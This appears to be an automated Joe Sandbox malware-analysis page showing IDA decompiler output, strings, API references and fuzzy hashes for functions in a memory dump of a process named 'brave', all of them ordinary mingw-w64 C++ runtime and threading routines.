Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 59c97ae42c308dfeb0f959f2ed3afa6849da74c1a26816688b8ea568bade8b86
Instruction ID: 9b39633c08a2d8b588c51e9b4f105dbc517283c892195a8ec5fb30f265c8bca9
Opcode Fuzzy Hash: 59c97ae42c308dfeb0f959f2ed3afa6849da74c1a26816688b8ea568bade8b86
Instruction Fuzzy Hash: ED51D4A2B0698681FE119B36EE402E453819F15FE0F5C8272EF2CD77D5DD5EE9D28204

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602D020 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A602D020(void* __eflags, long long* __rcx, intOrPtr* __rdx) {
				signed int _t6;
				long long _t15;
				long long _t17;
				signed char* _t18;

				_t17 =  *((intOrPtr*)(__rdx + 8));
				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				_t18 =  *((intOrPtr*)(__rdx));
				if (__eflags == 0) goto 0xa602d046;
				if (_t18 == 0) goto 0xa602d0b2;
				if (_t17 - 0xf > 0) goto 0xa602d080;
				if (_t17 != 1) goto 0xa602d070;
				_t6 =  *_t18 & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = _t17;
				 *((char*)(_t15 + _t17)) = 0;
				return _t6;
			}

0x7ff6a602d028
0x7ff6a602d02f
0x7ff6a602d033
0x7ff6a602d036
0x7ff6a602d03f
0x7ff6a602d044
0x7ff6a602d04a
0x7ff6a602d050
0x7ff6a602d052
0x7ff6a602d057
0x7ff6a602d05a
0x7ff6a602d05e
0x7ff6a602d06a

Strings

basic_string::_M_create, xrefs: 00007FF6A602D0BE, 00007FF6A602D152
basic_string::_M_construct null not valid, xrefs: 00007FF6A602D0B2
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A602D195, 00007FF6A602D1EF, 00007FF6A602D23F
basic_string::basic_string, xrefs: 00007FF6A602D18E, 00007FF6A602D1E8
string::string, xrefs: 00007FF6A602D238

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-4165567116
Opcode ID: e3e8cbf4f69290a6b3de281f3e3b3e56b2d6e49d707012ad7580e136db3a3009
Instruction ID: baecb73b4c75cd92fb5800777d5ab1cfd2d55ec4a21ef1c7ec0812fd84c1b4ff
Opcode Fuzzy Hash: e3e8cbf4f69290a6b3de281f3e3b3e56b2d6e49d707012ad7580e136db3a3009
Instruction Fuzzy Hash: A2510272A0BB4284EB109F25D5405A873A4FB18F94B944672CB6C973D5EF3EE9E6C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602D5D0 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A602D5D0(void* __eflags, long long* __rcx, intOrPtr* __rdx) {
				signed int _t6;
				long long _t15;
				long long _t17;
				signed char* _t18;

				_t17 =  *((intOrPtr*)(__rdx + 8));
				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				_t18 =  *((intOrPtr*)(__rdx));
				if (__eflags == 0) goto 0xa602d5f6;
				if (_t18 == 0) goto 0xa602d662;
				if (_t17 - 0xf > 0) goto 0xa602d630;
				if (_t17 != 1) goto 0xa602d620;
				_t6 =  *_t18 & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = _t17;
				 *((char*)(_t15 + _t17)) = 0;
				return _t6;
			}

0x7ff6a602d5d8
0x7ff6a602d5df
0x7ff6a602d5e3
0x7ff6a602d5e6
0x7ff6a602d5ef
0x7ff6a602d5f4
0x7ff6a602d5fa
0x7ff6a602d600
0x7ff6a602d602
0x7ff6a602d607
0x7ff6a602d60a
0x7ff6a602d60e
0x7ff6a602d61a

Strings

basic_string::_M_create, xrefs: 00007FF6A602D66E, 00007FF6A602D702
basic_string::_M_construct null not valid, xrefs: 00007FF6A602D662
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A602D745, 00007FF6A602D79F, 00007FF6A602D7EF
basic_string::basic_string, xrefs: 00007FF6A602D73E, 00007FF6A602D798
string::string, xrefs: 00007FF6A602D7E8

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-4165567116
Opcode ID: 57c91d0e2d534c20ff1c2b42a6d8babaaafc64c8f69f6f4f5bb2339d47d93c0b
Instruction ID: d072745408bbcf8cb196b5b4b170c3909fe98d13588b92f8ae6ea5c87c97002e
Opcode Fuzzy Hash: 57c91d0e2d534c20ff1c2b42a6d8babaaafc64c8f69f6f4f5bb2339d47d93c0b
Instruction Fuzzy Hash: EF51B272A0BB4684EB10AF25D5805A87364FB19F94B944672CB6C973C5EF3ED9E6C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6015560 Relevance: 10.6, APIs: 7, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF67FF6A6015560(void* __ecx, void* __rax, long long __rcx, void* __rdx, void* __r12, void* __r13) {
				int _t39;
				int _t42;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t91;
				intOrPtr _t93;
				long _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				long long _t120;

				_t81 = __rax;
				_t120 = __rcx;
				E00007FF67FF6A6012D40(__ecx, __rdx);
				 *((long long*)(_t81 + 8)) = _t120;
				if ( *((intOrPtr*)(_t81 + 0x1d8)) == 0) goto 0xa6015589;
				E00007FF67FF6A6013280(_t81,  *((intOrPtr*)(_t81 + 0x1d8)));
				if (( *(_t81 + 0x40) & 0x00000030) == 0) goto 0xa6015628;
				_t97 =  *0xa62b6920; // 0x7ff6a62c1400
				_t82 =  *_t97;
				if (_t82 == 0) goto 0xa6015609;
				if ( *((long long*)(_t82 + 0x30)) != 0) goto 0xa6015622;
				 *((long long*)( *_t97 + 0x30)) = 0xa62b2bd8;
				TlsGetValue(_t95);
				if (0xa62b2bd8 == 0) goto 0xa6015600;
				if ( *0x7FF6A62B2C00 == 0) goto 0xa601563a;
				 *0x7FF6A62B2C94 = 1;
				r13d =  *0x7FF6A62B2BE0;
				if ( *((intOrPtr*)(0x7ff6a62b2c08)) == 0) goto 0xa60155eb;
				CloseHandle(__r12);
				 *((long long*)(0x7ff6a62b2c08)) = 0;
				if (( *0x7FF6A62B2C1C & 0x00000004) != 0) goto 0xa601568d;
				__imp___endthreadex();
				E00007FF67FF6A6017060();
				if ( *((long long*)(0x7ff6a62b2c08)) == 0) goto 0xa60155a9;
				_t84 =  *_t97;
				if (_t84 != 0) goto 0xa6015622;
				E00007FF67FF6A6017060();
				goto 0xa60155b7;
				_t18 = _t97 + 0xd0; // 0xd0
				__imp__longjmp();
				 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x30)))) = 0xdeadbeef;
				if (_t18 == 0) goto 0xa601564b;
				_t39 = CloseHandle(__r13);
				 *((long long*)(0x7ff6a62b2c08)) = 0;
				r13d =  *((intOrPtr*)(0x7ff6a62b2be0));
				E00007FF67FF6A6012D20(_t39, 0xa62b2bd8);
				_t86 =  *_t97;
				if (_t86 == 0) goto 0xa60156d6;
				if ( *((long long*)(_t86 + 0x30)) != 0) goto 0xa60156c0;
				 *((long long*)(_t86 + 0x30)) = 0xa62b2bd8;
				TlsSetValue(??, ??);
				goto 0xa6015600;
				 *0xa62b2bd8 = 0xdeadbeef;
				_t42 = CloseHandle(??);
				 *((long long*)(0x7ff6a62b2c00)) = 0;
				E00007FF67FF6A6012D20(_t42, 0xa62b2bd8);
				_t88 =  *_t97;
				if (_t88 == 0) goto 0xa60156f4;
				if ( *((long long*)(_t88 + 0x30)) == 0) goto 0xa60156c6;
				goto 0xa601567e;
				 *((long long*)( *_t97 + 0x30)) = 0xa62b2bd8;
				goto 0xa601567e;
				E00007FF67FF6A6017060();
				_t91 =  *_t97;
				if ( *((long long*)(0x7ff6a62b2c08)) == 0) goto 0xa6015670;
				if (_t91 != 0) goto 0xa60156c0;
				E00007FF67FF6A6017060();
				goto 0xa60156c0;
				E00007FF67FF6A6017060();
				if ( *((long long*)(_t91 + 0x30)) == 0) goto 0xa60156c6;
				goto 0xa60156e8;
				asm("o16 nop [cs:eax+eax]");
				_push(_t97);
				_t98 =  *0xa62b6920; // 0x7ff6a62c1400
				_t93 =  *_t98;
				if (_t93 == 0) goto 0xa6015760;
				if ( *((long long*)(_t93 + 0x18)) != 0) goto 0xa6015780;
				 *((long long*)(_t93 + 0x18)) = 0xa62c13d0;
				if ( *0xa62c13d0 == 0) goto 0xa6015750;
				E00007FF67FF6A6012D40( *0xa62c13d0, 0xa62c13d0);
				if (0xa62c13d0 == 0) goto 0xa6015750;
				if ( *0x7FF6A62C13F0 <= 0) goto 0xa6015790;
				return 0;
			}

0x7ff6a6015560
0x7ff6a6015569
0x7ff6a601556c
0x7ff6a6015578
0x7ff6a6015582
0x7ff6a6015584
0x7ff6a601558d
0x7ff6a6015593
0x7ff6a601559a
0x7ff6a60155a0
0x7ff6a60155a7
0x7ff6a60155b3
0x7ff6a60155b9
0x7ff6a60155c5
0x7ff6a60155d0
0x7ff6a60155d2
0x7ff6a60155dc
0x7ff6a60155e3
0x7ff6a60155e5
0x7ff6a60155eb
0x7ff6a60155fa
0x7ff6a6015603
0x7ff6a6015609
0x7ff6a6015613
0x7ff6a6015615
0x7ff6a601561b
0x7ff6a601561d
0x7ff6a6015626
0x7ff6a6015628
0x7ff6a6015634
0x7ff6a601563a
0x7ff6a6015643
0x7ff6a6015645
0x7ff6a601564b
0x7ff6a6015657
0x7ff6a601565c
0x7ff6a6015661
0x7ff6a6015667
0x7ff6a601566e
0x7ff6a6015677
0x7ff6a6015682
0x7ff6a6015688
0x7ff6a6015692
0x7ff6a601569a
0x7ff6a60156a3
0x7ff6a60156ac
0x7ff6a60156b1
0x7ff6a60156b7
0x7ff6a60156be
0x7ff6a60156c4
0x7ff6a60156d0
0x7ff6a60156d4
0x7ff6a60156d6
0x7ff6a60156de
0x7ff6a60156e6
0x7ff6a60156eb
0x7ff6a60156ed
0x7ff6a60156f2
0x7ff6a60156f4
0x7ff6a60156fe
0x7ff6a6015703
0x7ff6a6015705
0x7ff6a6015710
0x7ff6a6015715
0x7ff6a601571c
0x7ff6a6015722
0x7ff6a6015729
0x7ff6a6015732
0x7ff6a601573d
0x7ff6a601573f
0x7ff6a6015747
0x7ff6a601574e
0x7ff6a6015757

APIs

Part of subcall function 00007FF6A6012D40: TlsGetValue.KERNEL32 ref: 00007FF6A6012DA0

TlsGetValue.KERNEL32 ref: 00007FF6A60155B9
CloseHandle.KERNEL32 ref: 00007FF6A60155E5
_endthreadex.MSVCRT ref: 00007FF6A6015603
longjmp.MSVCRT ref: 00007FF6A6015634
CloseHandle.KERNEL32 ref: 00007FF6A6015645
TlsSetValue.KERNEL32 ref: 00007FF6A6015682
CloseHandle.KERNEL32 ref: 00007FF6A601569A

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CloseHandleValue$_endthreadexlongjmp
String ID:
API String ID: 3990644698-0
Opcode ID: 0214bab7663271ea6fee6ac32ca2fa0cc39244fbefd9c866a5c200fdd5429a6d
Instruction ID: 277c47e4843fa5feaeae2c02c4a8d8ca1e9678e54e3fb12ee5364ceef0b88e0a
Opcode Fuzzy Hash: 0214bab7663271ea6fee6ac32ca2fa0cc39244fbefd9c866a5c200fdd5429a6d
Instruction Fuzzy Hash: DB511661A0BB0A85EBA69B12D65437837A4FF44F8CF055035DA0DCB391DF3EA4A4C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60178B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A60178B0(void* __edx, intOrPtr* __rcx) {
				intOrPtr _t19;
				intOrPtr _t23;
				void* _t28;
				intOrPtr* _t29;

				_t29 =  *0xa62b6920; // 0x7ff6a62c1400
				_t19 =  *_t29;
				r12d = __edx;
				if (_t19 == 0) goto 0xa6017948;
				if ( *((long long*)(_t19 + 0xa0)) != 0) goto 0xa6017968;
				 *((long long*)(_t19 + 0xa0)) = 0xa62b2be8;
				E00007FF67FF6A6018830(0xa62b2be8, _t28);
				if ( *((intOrPtr*)( *__rcx)) != 0xbab1f0ed) goto 0xa60179a9;
				if ( *((intOrPtr*)( *__rcx + 4)) <= 0) goto 0xa60179a9;
				 *((intOrPtr*)( *__rcx + 4)) =  *((intOrPtr*)( *__rcx + 4)) - 1;
				_t23 =  *_t29;
				if (_t23 == 0) goto 0xa6017978;
				if ( *((long long*)(_t23 + 0xa0)) != 0) goto 0xa60179a0;
				 *((long long*)(_t23 + 0xa0)) = 0xa62b2be8;
				E00007FF67FF6A6018870(0xa62b2be8);
				return r12d;
			}

0x7ff6a60178b8
0x7ff6a60178bf
0x7ff6a60178c5
0x7ff6a60178cb
0x7ff6a60178d5
0x7ff6a60178e2
0x7ff6a60178e9
0x7ff6a60178f7
0x7ff6a6017905
0x7ff6a601790e
0x7ff6a6017912
0x7ff6a6017918
0x7ff6a6017922
0x7ff6a601792b
0x7ff6a6017932
0x7ff6a6017942

Strings

Assertion failed: (%s), file %s, line %d, xrefs: 00007FF6A60179CD
C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 00007FF6A60179BC
(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 00007FF6A60179C3
., xrefs: 00007FF6A60179B4

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$.$Assertion failed: (%s), file %s, line %d$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c
API String ID: 0-3957588491
Opcode ID: 84b45b647fba6786e436b223dfef3815ddb9f00301ce0779b142d07c5678c86d
Instruction ID: d213dd292024e7dd7b2472116dddb672d8ebb8f18997aca75341d86d2d983531
Opcode Fuzzy Hash: 84b45b647fba6786e436b223dfef3815ddb9f00301ce0779b142d07c5678c86d
Instruction Fuzzy Hash: 80315C32A4B74685EB129B15D5103B86BA0FF45F48F848175DA4C87392DF3EE4A9C311

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600F130 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00007FF67FF6A600F130(void* __ecx, void* __eflags, char* __rax, long long __rdx, void* __r8) {
				intOrPtr _t7;
				void* _t12;
				long long _t23;
				int _t24;
				struct _CRITICAL_SECTION* _t33;
				struct _CRITICAL_SECTION* _t36;

				asm("lodsb");
				if (__eflags > 0) goto 0xa600f15d;
				 *((intOrPtr*)(__rax - 0x77)) =  *((intOrPtr*)(__rax - 0x77)) + __ecx;
				asm("sbb eax, 0x2b2065");
				if ( *__rax != 0) goto 0xa600f016;
				E00007FF67FF6A6021B50(_t12, 0x7ff6a600ef50);
				goto 0xa600f016;
				asm("o16 nop [cs:eax+eax]");
				_t7 =  *0xa62c11b0; // 0x0
				if (_t7 == 0) goto 0xa600f200;
				if (__r8 == 0) goto 0xa600f1a5;
				if (__r8 == 0xa62c11a0) goto 0xa600f1a5;
				r8d = 0x2b;
				0xa6021790();
				calloc(_t24);
				if (0xa62c11a0 == 0) goto 0xa600f200;
				 *0xa62c11a0 = 0x7ff6a600ef50;
				 *0x7FF6A62C11A8 = __rdx;
				EnterCriticalSection(_t36);
				_t23 =  *0xa62c11a8; // 0x0
				 *0xa62c11a8 = 0xa62c11a0;
				 *0x7FF6A62C11B0 = _t23;
				LeaveCriticalSection(_t33);
				return 0;
			}

0x7ff6a600f130
0x7ff6a600f131
0x7ff6a600f133
0x7ff6a600f136
0x7ff6a600f13e
0x7ff6a600f14b
0x7ff6a600f150
0x7ff6a600f155
0x7ff6a600f167
0x7ff6a600f175
0x7ff6a600f17e
0x7ff6a600f18a
0x7ff6a600f18c
0x7ff6a600f1a0
0x7ff6a600f1af
0x7ff6a600f1ba
0x7ff6a600f1bc
0x7ff6a600f1c6
0x7ff6a600f1ca
0x7ff6a600f1d0
0x7ff6a600f1de
0x7ff6a600f1e5
0x7ff6a600f1e9
0x7ff6a600f1f8

APIs

_assert.MSVCRT ref: 00007FF6A600F1A0
calloc.MSVCRT ref: 00007FF6A600F1AF
EnterCriticalSection.KERNEL32 ref: 00007FF6A600F1CA
LeaveCriticalSection.KERNEL32 ref: 00007FF6A600F1E9

Strings

!dso || dso == &__dso_handle, xrefs: 00007FF6A600F199
C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF6A600F192

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave_assertcalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 4191840866-4180103562
Opcode ID: 89d225980ee264ff5e357f890741bd0a0885e460cb129bedeac4b07323f812ca
Instruction ID: 3ad1d7a560fc519caafae4bdbe6e83088bcad58a4c3d176b31a9cac702fd58bd
Opcode Fuzzy Hash: 89d225980ee264ff5e357f890741bd0a0885e460cb129bedeac4b07323f812ca
Instruction Fuzzy Hash: 28216FA2E1F64255FB12DB24FA552B426A0AF64F80F890170CA0DC32D5EE6EF9E59310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6019F30 Relevance: 10.5, APIs: 7, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6019F30(void* __edx, void* __rcx, void* __r8) {

				r12d = __edx;
				if (__r8 == 0) goto 0xa6019fa1;
				if (__rcx != 0) goto 0xa6019f60;
				if (r12d != 0) goto 0xa6019f8d;
				return r12d;
			}

0x7ff6a6019f3a
0x7ff6a6019f40
0x7ff6a6019f45
0x7ff6a6019f4a
0x7ff6a6019f56

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF6A6019F60
OpenProcess.KERNEL32 ref: 00007FF6A6019F77
CloseHandle.KERNEL32 ref: 00007FF6A6019F85
_errno.MSVCRT ref: 00007FF6A6019FA1

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen_errno
String ID:
API String ID: 2250453136-0
Opcode ID: 99bff5ea223eaa426eec811e31877ad3ae2d66184df2aefccc3710fd92dcba7e
Instruction ID: 50dfa47ec207faa8ceed0f968582d53cf370df3371ddb7f66ecb31ed6ee710cf
Opcode Fuzzy Hash: 99bff5ea223eaa426eec811e31877ad3ae2d66184df2aefccc3710fd92dcba7e
Instruction Fuzzy Hash: 0D01C021D4FA0392EB250F619A4423921A0BF44F69F142238EA3B862D4DE3F74D4C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6018980 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF6A60189A0
fprintf.MSVCRT ref: 00007FF6A60189BF
GetCurrentThreadId.KERNEL32 ref: 00007FF6A60189D5
fprintf.MSVCRT ref: 00007FF6A60189FC

Strings

C%p %d V=%0X w=%ld %s, xrefs: 00007FF6A60189E3
C%p %d %s, xrefs: 00007FF6A60189AE

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CurrentThreadfprintf
String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
API String ID: 1384477639-884133013
Opcode ID: f8158c71ef050e1e9cbf393265222da93de2fa9e8f3a0d98d13ba6446c91282d
Instruction ID: 21bc3338d9251b2639855de76a046dc26f98189ebd22c4559cd9e53495fad236
